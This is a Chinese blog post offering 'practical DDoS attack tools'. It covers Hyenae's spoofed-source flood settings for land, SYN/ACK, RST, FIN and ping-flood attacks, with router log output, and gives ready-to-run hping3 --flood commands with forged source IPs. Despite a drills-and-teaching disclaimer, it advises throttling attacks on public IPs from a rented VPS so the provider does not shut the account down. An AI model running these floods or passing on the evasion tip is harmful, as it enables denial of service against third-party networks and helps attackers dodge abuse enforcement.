实用的DDos攻击工具

来源： http://www.safecdn.cn/linux/2018/12/ddos/95.html ‎

特别提示：仅用于攻防演练及教学测试用途，禁止非法使用

Hyenae

是在windows平台上非常好用的一款ddos攻击工具，可以完成绝大多数的攻击操作。

download

https://sourceforge.net/projects/hyenae/

Features

ARP-Request flooding
ARP-Cache poisoning
PPPoE session initiation flooding
Blind PPPoE session termination
ICMP-Echo flooding
ICMP-Smurf attack
ICMP based TCP-Connection reset
TCP-SYN flooding
TCP-Land attack
Blind TCP-Connection reset
UDP flooding
DNS-Query flooding
DHCP-Discover flooding
DHCP starvation attack
DHCP-Release forcing
Cisco HSRP active router hijacking
Pattern based packet address configuration
Intelligent address and address protocol detection
Smart wildcard-based randomization
Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

鬣狗界面

hyenae的界面比较简单，图中展示的是SYN/ACK洪泛攻击的配置选项。

operation mode中可以选择网卡

Network Protocol中可以选择攻击方式对应的网络协议，如SYN洪泛攻击对应传输层的TCP，IP协议可选IPv4, IPv6

攻击源的IP,MAC地址以及端口号可以非常灵活的设置，按MAC-IP@port的格式书写，如图中的攻击源匹配模式%-172.17.14.158@80
- % 代表任意，在此处代表任意的MAC地址
- 172.17.14.158为伪造的攻击源IP，可以修改为任意的合法IP
- 80为端口号，80同时也是网络服务器的默认端口

攻击目标的设置方式与攻击源一致，图中的%-172.17.14.10@80
- % 随机生成MAC地址
- 172.17.14.10代表被攻击的IP
- 80为攻击目标的被攻击端口号

针对TCP协议，右侧给出其对应的5个常见flags: FIN, SYN, RST, PSH, ACK
- 可以随意进行单选或多选，以实现不同的攻击方式
- 随意的组合可以产生正常通信过程中无法出现的数据包

软件下方可以设置数据包的发送速率，默认为无限速发送，这会暂用大量带宽，导致网络拥塞；当然啦，这个软件本就是为了攻击网络，导致网络瘫痪正是其目的所在

选择不同的攻击方式，会显示相应不同的配置选项

简单说，这幅图的作用是产生MAC地址随机，IP为172.17.14.158，端口为80的伪造源，去攻击目的MAC随机，IP为172.17.14.10的web server。

由于目的MAC随机，当MAC地址首字节为奇数时，生成的数据包为广播包，此时将产生广播风暴，局域网内的所有设备都将收到大量的广播包，当速率很高时，很容易导致局域网瘫痪，这是需要注意的。本人当时年少轻狂，有次测试，使用全速率的广播式SYN/ACK攻击，直接导致部门的局域网瘫痪断网，幸好是晚上，后来找人重置了部门内的网络设备才恢复，想想真是罪过啊。

Use cases

Land Attack
- src: %-172.17.14.94@53
- des: %-172.17.14.94@80

DoS *** 3118 *** {Land Attack} are suppressed!

[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,

[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,

[DoS Attack: Land Attack] from source: 172.17.14.94, port 53,

SYN/ACK scan (TCP SYN ACK)
- src: %-172.17.14.8@80
- des: %-172.17.14.94@80

DoS *** 3896 *** {SYN/ACK Scan} are suppressed!

[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,

[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,

[DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,

ping flood (icmp echo)
- src: %-172.17.14.8
- des: %-172.17.14.94

DoS *** 1881 *** {Ping Flood} are suppressed!

[DoS Attack: Ping Flood] from source: 172.17.14.8,

[DoS Attack: Ping Flood] from source: 172.17.14.8,

[DoS Attack: Ping Flood] from source: 172.17.14.8,

ping sweep (icmp echo)
- src: %-%
- des: %-%

DoS *** 1719 *** {Ping Sweep} are suppressed!

[DoS Attack: Ping Sweep] from source: 188.167.1.1,

[DoS Attack: Ping Sweep] from source: 113.172.1.5,

[DoS Attack: Ping Sweep] from source: 175.181.2.6,

RST Scan(TCP RST)
- src: %-172.17.14.8@80
- des: %-172.17.14.94@80

DoS *** 4023 *** {RST Scan} are suppressed!

[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,

[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,

[DoS Attack: RST Scan] from source: 172.17.14.8, port 80,

ACK scan (TCP ACK)
- src: %-172.17.14.8@80
- des: %-172.17.14.94@80

DoS *** 3989 *** {ACK Scan} are suppressed!

[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,

[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,

[DoS Attack: ACK Scan] from source: 172.17.14.8, port 80

FIN scan(TCP FIN)
- src: %-172.17.14.8@80
- des: %-172.17.14.94@80

DoS *** 3009 *** {FIN Scan} are suppressed!

[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

[DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

hping3

用于生成和解析TCPIP协议数据包的开源工具

hping3同样可用于产生ddos攻击包，但与hyenae不同的是，hping3无法手动设置MAC地址，而是根据IP地址自动获取

需要注意的是，如果使用搬瓦工购买的vps向公网IP执行hping3攻击的话，最好不要尝试，如果要用也一定记得限速，否则就会被警告并关停,当然你有3次机会重置

vps警告

examples

# land attack

$ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52

# syn/ack attack

$ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52

# -V verbose

# -c packet count

# -d data size

# -p destPort

# -s srcPort

# -a srcIP

# -S SYN tag

# -A ACK tag

# -w winsize

# -I interface

reference

网络攻击工具
- hping3
  - http://man.linuxde.net/hping3
  - http://0daysecurity.com/articles/hping3_examples.html
- LOIC
- http://sourceforge.net/projects/loic/
- hyenae
  - https://sourceforge.net/projects/hyenae/
- 免费DDOS攻击测试工具大合集 http://www.freebuf.com/sectool/36545.html

ddos攻击说明
- https://security.radware.com/ddos-knowledge-center/ddospedia/syn-flood/
- 网络攻击：半连接攻击(SYN攻击)、全连接攻击、RST攻击、IP欺骗、DNS欺骗、DOS/DDOS攻击 http://blog.csdn.net/guowenyan001/article/details/11777361